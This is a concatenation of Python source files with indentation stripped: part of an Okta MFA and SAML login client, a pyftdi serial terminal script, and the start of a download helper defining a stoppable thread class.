self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
while response_data['status'] != 'SUCCESS':
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
self.ui.info("Waiting for MFA success...")
time.sleep(2)
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
# return None
def _get_response_data(self, href, state_token):
response = self._http_client.post(href,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
return response_data
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
elif factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ", hidden=True)
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
try:
if '_embedded' in response_data['_embedded']['factor']:
if response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer']:
if self._print_correct_answer:
self._print_correct_answer(response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer'])
self._print_correct_answer = None
except:
pass
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# should be deprecated soon as OKTA move forward webauthN
# just for backward compatibility
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except Exception:
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
""" Authenticator """
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
# noinspection PyBroadException
try:
client_data, assertion = webauthn_client.verify()
except Exception:
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data,
'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for input_tag in saml_soup.find_all('input'):
if input_tag.get('name') == 'SAMLResponse':
saml_response = input_tag.get('value')
elif input_tag.get('name') == 'RelayState':
relay_state = input_tag.get('value')
if saml_response is None:
state_token = self._extract_state_token_from_http_response(response)
if state_token:
api_response = self.stepup_auth(url, state_token)
if 'sessionToken' in api_response:
saml_request_url = url + '?sessionToken=' + api_response['sessionToken']
else:
saml_request_url = url + '?stateToken=' + api_response['_links']['next']['href']
saml_response = self.get_saml_response(saml_request_url)
return saml_response
saml_error = 'Did not receive SAML Response after successful authentication [' + url + ']'
if saml_soup.find(class_='error-content') is not None:
saml_error += '\n' + saml_soup.find(class_='error-content').get_text()
raise RuntimeError(saml_error)
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
# even though duo supports both passcode and push, okta only lists web as an available factor. This if statement
# adds the additional supported factors only if the provider is duo, and the web factor is the only one provided
if len(factors) == 1 and factors[0].get('provider') == 'DUO' and factors[0].get('factorType') == 'web':
push = copy.deepcopy(factors[0])
push['factorType'] = "push"
factors.append(push)
passcode = copy.deepcopy(factors[0])
passcode['factorType'] = "passcode"
factors.append(passcode)
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self._get_user_int_factor_choice(len(factors))
# make sure the choice is valid
if selection is None:
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[selection]
def _get_user_int_factor_choice(self, max_int, max_retries=5):
for _ in range(max_retries):
value = self.ui.input('Selection: ')
try:
selection = int(value.strip())
except ValueError:
self.ui.warning(
'Invalid selection {!r}, must be an integer value.'.format(value)
)
continue
if 0 <= selection <= max_int:
return selection
else:
self.ui.warning(
'Selection {!r} out of range <0, {}>'.format(selection, max_int)
)
return None
def _build_factor_name(self, factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
elif factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
factor_name = None
try:
registered_authenticators = RegisteredAuthenticators(self.ui)
credential_id = websafe_decode(factor['profile']['credentialId'])
factor_name = registered_authenticators.get_authenticator_user(credential_id)
except Exception:
pass
default_factor_name = factor['profile'].get('authenticatorName') or factor['factorType']
factor_name = factor_name or default_factor_name
return factor['factorType'] + ": " + factor_name
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, offer to save the password
password = keyring.get_password(self.KEYRING_SERVICE, username)
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
if self.ui.input("Do you want to save this password in the keyring? (y/N) ") == 'y':
try:
keyring.set_password(self.KEYRING_SERVICE, username, password)
self.ui.info("Password for {} saved in keyring.".format(username))
except RuntimeError as err:
self.ui.warning("Failed to save password in keyring: " + str(err))
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
def setup_fido_authenticator(self):
setup_fido_authenticator_url = self._okta_org_url + '/user/settings/factors/setup?factorType=FIDO_WEBAUTHN'
response = self._http_client.get(setup_fido_authenticator_url, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
parsed_url = urlparse(response.url)
if parsed_url and parsed_url.path == '/user/verify_password':
response = self._verify_password(response)
state_token = self._extract_state_token_from_http_response(response)
if not state_token:
raise RuntimeError('Could not extract state token from http response')
try:
self.stepup_auth(setup_fido_authenticator_url, state_token)
except errors.GimmeAWSCredsMFAEnrollStatus:
# Expected while adding a new fido authenticator
pass
response = self._http_client.get(setup_fido_authenticator_url, json={'stateToken': state_token},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
state_token = self._extract_state_token_from_http_response(response)
credential_id, user_name = self._activate_webauthn_factor(state_token)
self.ui.info('\nAuthenticator setup finished successfully.')
return credential_id, user_name
def _verify_password(self, verify_password_page_response):
creds = self._get_username_password_creds()
saml_soup = BeautifulSoup(verify_password_page_response.text, "html.parser")
token_elem = saml_soup.find(id='_xsrfToken')
if not token_elem:
raise RuntimeError('Could not find expected xsrf token in password verification page: id="_xsrfToken"')
if not token_elem.has_attr('value'):
raise RuntimeError('Could not find expected "value" attribute for xsrf dom element in password '
'verification page')
xsrf_token = token_elem.get('value')
if not xsrf_token:
raise RuntimeError('Could not find non-blank "value" attribute for xsrf dom element in password'
'verification page')
headers = self._get_headers()
# Must be form urlencoded
headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
data = '_xsrfToken={xsrf_token}&password={password}'.format(xsrf_token=xsrf_token, password=creds['password'])
response = self._http_client.post(self._okta_org_url + '/user/verify_password',
data=data, headers=headers, verify=self._verify_ssl_certs)
response.raise_for_status()
response = self._http_client.get(
self._okta_org_url + '/login/second-factor?fromURI=%2Fenduser%2Fsettings&forcePrompt=true&hideBgImage=true',
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return response
def _activate_webauthn_factor(self, state_token):
enrollment_response = self._enroll_factor(state_token)
response_json = enrollment_response.json()
next_link = response_json['_links']['next']
if next_link['name'] != 'activate':
raise RuntimeError('Expected next link to be an activation link, actually got: ' + next_link["name"])
factor_obj = response_json['_embedded']['factor']
activation_obj = factor_obj['_embedded']['activation']
challenge = activation_obj.get('challenge')
user_obj = activation_obj.get('user', {})
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, challenge)
client_data_json, attestation = webauthn_client.make_credential(user_obj)
client_data = str(base64.urlsafe_b64encode(client_data_json), 'utf-8')
attestation_data = str(base64.urlsafe_b64encode(attestation), 'utf-8')
response = self._http_client.post(
next_link['href'],
json={"stateToken": state_token, "clientData": client_data, "attestation": attestation_data},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
session_token = response.json()['sessionToken']
redirect_url = quote(self._okta_org_url + '/enduser/settings?enrolledFactor=FIDO_WEBAUTHN')
response = self._http_client.get(
self._okta_org_url + '/login/sessionCookieRedirect?checkAccountSetupComplete=true&'
'token={session_token}&redirectUrl={redirect_url}'.format(session_token=session_token,
redirect_url=redirect_url),
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return attestation.auth_data.credential_data.credential_id, user_obj.get('name', 'gimme-aws-creds')
def _enroll_factor(self, state_token):
factors = self._introspect_factors(state_token)
if len(factors) != 1:
raise RuntimeError('Expected the state token to request enrollment for a specific factor')
# The state token should be set to return a specific factor
webauthn_factor = factors[0]
response = self._http_client.post(
webauthn_factor['_links']['enroll']['href'],
json={"stateToken": state_token, "factorType": webauthn_factor['factorType'],
"provider": webauthn_factor['provider']},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return response
def _introspect_factors(self, state_token):
response = self._http_client.post(self._okta_org_url + '/api/v1/authn/introspect',
json={"stateToken": state_token}, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
factors = response.json()['_embedded']['factors']
if not factors:
raise RuntimeError('Could not introspect factors')
return factors
@staticmethod
def _extract_state_token_from_http_response(http_res):
saml_soup = BeautifulSoup(http_res.text, "html.parser")
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
# noinspection PyTypeChecker
state_token = decode(re.search(r"var stateToken = '(.*)';", http_res.text).group(1), "unicode-escape")
return state_token
for tag in saml_soup.find_all('body'):
# checking all the tags in body tag for Extra Verification string
if re.search(r"Extra Verification", tag.text, re.IGNORECASE):
# extract the stateToken from response (form action) instead of javascript variable
# noinspection PyTypeChecker
pre_state_token = decode(re.search(r"stateToken=(.*?[ \"])", http_res.text).group(1), "unicode-escape")
state_token = pre_state_token.rstrip('\"')
return state_token
return None
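# Usage sketch (illustrative only, not part of the original module; the concrete
# UserInterface instance passed as gac_ui, the org URL and the username below are
# assumptions -- in practice gimme-aws-creds supplies them from its own config):
#
#   client = OktaClient(gac_ui=some_ui, okta_org_url='https://example.okta.com')
#   client.set_username('alice@example.com')
#   client.set_preferred_mfa_type('push')
#   session = client.auth_session()
#   # -> {'username': ..., 'session': <sid cookie>, 'device_token': <DT cookie>}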
|
pyterm.py
|
#!/home/pi/repos/gateway_pi/virtual/bin/python
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2020, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Neotion nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL NEOTION BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=too-many-instance-attributes
#pylint: disable-msg=too-many-arguments
#pylint: disable-msg=too-many-nested-blocks
#pylint: disable-msg=too-many-branches
#pylint: disable-msg=too-many-statements
#pylint: disable-msg=too-few-public-methods
#pylint: disable-msg=broad-except
#pylint: disable-msg=wrong-import-position
from argparse import ArgumentParser, FileType
from atexit import register
from collections import deque
from logging import Formatter, StreamHandler, DEBUG, ERROR
from os import environ, linesep, name as os_name, read as os_read, stat
from sys import modules, platform, stderr, stdin, stdout
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
MSWIN = platform == 'win32'
if not MSWIN:
from termios import TCSANOW, tcgetattr, tcsetattr
from pyftdi import FtdiLogger
from pyftdi.ftdi import Ftdi
from pyftdi.misc import to_bps, add_custom_devices
#pylint: disable-msg=invalid-name
#pylint: disable-msg=import-error
if os_name == 'nt':
import msvcrt
else:
msvcrt = None
#pylint: enable-msg=invalid-name
#pylint: enable-msg=import-error
class MiniTerm:
"""A mini serial terminal to demonstrate pyserial extensions"""
DEFAULT_BAUDRATE = 115200
def __init__(self, device, baudrate=None, parity=None, rtscts=False,
debug=False):
self._termstates = []
if not MSWIN and stdout.isatty():
self._termstates = [(fd, tcgetattr(fd)) for fd in
(stdin.fileno(), stdout.fileno(),
stderr.fileno())]
self._device = device
self._baudrate = baudrate or self.DEFAULT_BAUDRATE
self._port = self._open_port(self._device, self._baudrate, parity,
rtscts, debug)
self._resume = False
self._silent = False
self._rxq = deque()
self._rxe = Event()
self._debug = debug
register(self._cleanup)
def run(self, fullmode=False, loopback=False, silent=False,
localecho=False, autocr=False):
"""Switch to a pure serial terminal application"""
        # wait forever, although Windows is stupid and does not signal Ctrl+C,
        # so use a 1/2-second timeout that gives some time to check for a
        # Ctrl+C break, then poll again...
print('Entering minicom mode @ %d bps' % self._port.baudrate)
stdout.flush()
self._port.timeout = 0.5
self._resume = True
# start the reader (target to host direction) within a dedicated thread
args = [loopback]
if self._device.startswith('ftdi://'):
# with pyftdi/pyusb/libusb stack, there is no kernel buffering
# which means that a UART source with data burst may overflow the
# FTDI HW buffer while the SW stack is dealing with formatting
# and console output. Use an intermediate thread to pop out data
# out from the HW as soon as it is made available, and use a deque
# to serve the actual reader thread
args.append(self._get_from_source)
            sourcer = Thread(target=self._sourcer)
            sourcer.daemon = True
            sourcer.start()
else:
# regular kernel buffered device
args.append(self._get_from_port)
        reader = Thread(target=self._reader, args=tuple(args))
        reader.daemon = True
        reader.start()
# start the writer (host to target direction)
self._writer(fullmode, silent, localecho, autocr)
def _sourcer(self):
try:
while self._resume:
data = self._port.read(4096)
if not data:
continue
self._rxq.append(data)
self._rxe.set()
except Exception as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
def _get_from_source(self):
while not self._rxq and self._resume:
if self._rxe.wait(0.1):
self._rxe.clear()
break
if not self._rxq:
return bytearray()
return self._rxq.popleft()
def _get_from_port(self):
try:
return self._port.read(4096)
except OSError as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
except Exception as ex:
print(str(ex), file=stderr)
return bytearray()
def _reader(self, loopback, getfunc):
"""Loop forever, processing received serial data in terminal mode"""
try:
# Try to read as many bytes as possible at once, and use a short
# timeout to avoid blocking for more data
self._port.timeout = 0.050
while self._resume:
if self._silent:
sleep(0.25)
continue
data = getfunc()
if data:
stdout.write(data.decode('utf8', errors='replace'))
stdout.flush()
if loopback:
self._port.write(data)
except KeyboardInterrupt:
return
except Exception as exc:
print("Exception: %s" % exc)
if self._debug:
print(format_exc(chain=False), file=stderr)
interrupt_main()
def _writer(self, fullmode, silent, localecho, crlf=0):
"""Loop and copy console->serial until EOF character is found"""
while self._resume:
try:
char = getkey()
if MSWIN:
if ord(char) == 0x3:
raise KeyboardInterrupt()
if fullmode and ord(char) == 0x2: # Ctrl+B
self._cleanup()
return
if silent:
if ord(char) == 0x6: # Ctrl+F
self._silent = True
print('Silent\n')
continue
if ord(char) == 0x7: # Ctrl+G
self._silent = False
print('Reg\n')
continue
else:
if localecho:
stdout.write(char.decode('utf8', errors='replace'))
stdout.flush()
if crlf:
if char == b'\n':
self._port.write(b'\r')
if crlf > 1:
continue
self._port.write(char)
except KeyboardInterrupt:
if fullmode:
continue
print('%sAborting...' % linesep)
self._cleanup()
return
def _cleanup(self):
"""Cleanup resource before exiting"""
try:
self._resume = False
if self._port:
# wait till the other thread completes
sleep(0.5)
try:
rem = self._port.inWaiting()
except IOError:
# maybe a bug in underlying wrapper...
rem = 0
# consumes all the received bytes
for _ in range(rem):
self._port.read()
self._port.close()
self._port = None
print('Bye.')
for tfd, att in self._termstates:
tcsetattr(tfd, TCSANOW, att)
except Exception as ex:
print(str(ex), file=stderr)
@staticmethod
def _open_port(device, baudrate, parity, rtscts, debug=False):
"""Open the serial communication port"""
try:
from serial.serialutil import SerialException
from serial import PARITY_NONE
except ImportError:
raise ImportError("Python serial module not installed")
try:
from serial import serial_for_url, VERSION as serialver
version = tuple([int(x) for x in serialver.split('.')])
if version < (3, 0):
raise ValueError
except (ValueError, IndexError, ImportError):
raise ImportError("pyserial 3.0+ is required")
# the following import enables serial protocol extensions
if device.startswith('ftdi:'):
try:
from pyftdi import serialext
serialext.touch()
except ImportError:
raise ImportError("PyFTDI module not installed")
try:
port = serial_for_url(device,
baudrate=baudrate,
parity=parity or PARITY_NONE,
rtscts=rtscts,
timeout=0)
if not port.is_open:
port.open()
if not port.is_open:
raise IOError('Cannot open port "%s"' % device)
if debug:
backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
print("Using serial backend '%s'" % backend)
return port
except SerialException as exc:
raise IOError(str(exc))
def get_default_device() -> str:
"""Return the default comm device, depending on the host/OS."""
envdev = environ.get('FTDI_DEVICE', '')
if envdev:
return envdev
if platform == 'win32':
device = 'COM1'
elif platform == 'darwin':
device = '/dev/cu.usbserial'
elif platform == 'linux':
device = '/dev/ttyS0'
else:
device = ''
try:
stat(device)
except OSError:
device = 'ftdi:///1'
return device
def init_term(fullterm: bool) -> bool:
"""Internal terminal initialization function"""
if os_name == 'nt':
return True
if os_name == 'posix':
import termios
tfd = stdin.fileno()
old = termios.tcgetattr(tfd)
new = termios.tcgetattr(tfd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
if fullterm:
new[6][termios.VINTR] = 0
new[6][termios.VSUSP] = 0
termios.tcsetattr(tfd, termios.TCSANOW, new)
def cleanup_console():
termios.tcsetattr(tfd, termios.TCSAFLUSH, old)
# terminal modes have to be restored on exit...
register(cleanup_console)
return True
else:
return True
def getkey() -> bytes:
"""Return a key from the current console, in a platform independent way"""
# there's probably a better way to initialize the module without
# relying onto a singleton pattern. To be fixed
if os_name == 'nt':
# w/ py2exe, it seems the importation fails to define the global
# symbol 'msvcrt', to be fixed
        while True:
            char = msvcrt.getch()
            if char == b'\3':
                raise KeyboardInterrupt('Ctrl-C break')
            if char == b'\0':
                msvcrt.getch()
            else:
                if char == b'\r':
                    return b'\n'
                return char
elif os_name == 'posix':
char = os_read(stdin.fileno(), 1)
return char
else:
import time
time.sleep(1)
return None
def is_term():
"""Tells whether the current stdout/stderr stream are connected to a
terminal (vs. a regular file or pipe)"""
return stdout.isatty()
def is_colorterm():
"""Tells whether the current terminal (if any) support colors escape
sequences"""
terms = ['xterm-color', 'ansi']
return stdout.isatty() and environ.get('TERM') in terms
def main():
"""Main routine"""
debug = False
try:
default_device = get_default_device()
argparser = ArgumentParser(description=modules[__name__].__doc__)
if platform != 'win32':
argparser.add_argument('-f', '--fullmode', dest='fullmode',
action='store_true',
help='use full terminal mode, exit with '
'[Ctrl]+B')
argparser.add_argument('device', nargs='?', default=default_device,
help='serial port device name (default: %s)' %
default_device)
argparser.add_argument('-b', '--baudrate',
help='serial port baudrate (default: %d)' %
MiniTerm.DEFAULT_BAUDRATE,
default='%s' % MiniTerm.DEFAULT_BAUDRATE)
argparser.add_argument('-w', '--hwflow',
action='store_true',
help='hardware flow control')
argparser.add_argument('-e', '--localecho',
action='store_true',
help='local echo mode (print all typed chars)')
argparser.add_argument('-r', '--crlf',
action='count', default=0,
help='prefix LF with CR char, use twice to '
'replace all LF with CR chars')
argparser.add_argument('-l', '--loopback',
action='store_true',
help='loopback mode (send back all received '
'chars)')
argparser.add_argument('-s', '--silent', action='store_true',
help='silent mode')
argparser.add_argument('-P', '--vidpid', action='append',
help='specify a custom VID:PID device ID, '
'may be repeated')
argparser.add_argument('-V', '--virtual', type=FileType('r'),
help='use a virtual device, specified as YaML')
argparser.add_argument('-v', '--verbose', action='count',
help='increase verbosity')
argparser.add_argument('-d', '--debug', action='store_true',
help='enable debug mode')
args = argparser.parse_args()
debug = args.debug
if not args.device:
argparser.error('Serial device not specified')
loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
loglevel = min(ERROR, loglevel)
if debug:
formatter = Formatter('%(asctime)s.%(msecs)03d %(name)-20s '
'%(message)s', '%H:%M:%S')
else:
formatter = Formatter('%(message)s')
FtdiLogger.set_formatter(formatter)
FtdiLogger.set_level(loglevel)
FtdiLogger.log.addHandler(StreamHandler(stderr))
if args.virtual:
from pyftdi.usbtools import UsbTools
# Force PyUSB to use PyFtdi test framework for USB backends
UsbTools.BACKENDS = ('pyftdi.tests.backend.usbvirt', )
# Ensure the virtual backend can be found and is loaded
backend = UsbTools.find_backend()
loader = backend.create_loader()()
loader.load(args.virtual)
try:
add_custom_devices(Ftdi, args.vidpid)
except ValueError as exc:
argparser.error(str(exc))
init_term(args.fullmode)
miniterm = MiniTerm(device=args.device,
baudrate=to_bps(args.baudrate),
parity='N',
rtscts=args.hwflow,
debug=args.debug)
miniterm.run(args.fullmode, args.loopback, args.silent, args.localecho,
args.crlf)
except (IOError, ValueError) as exc:
print('\nError: %s' % exc, file=stderr)
if debug:
print(format_exc(chain=False), file=stderr)
exit(1)
except KeyboardInterrupt:
exit(2)
if __name__ == '__main__':
main()
|
download.py
|
import os
import requests
import threading
import psutil
# Todo: Create a better stoppable thread class.
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
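# Hedged usage sketch (not part of the original module): StoppableThread is
# meant to be subclassed, and the subclass's run() loop has to poll stopped()
# itself. The Worker below is hypothetical and only illustrates that pattern:
#
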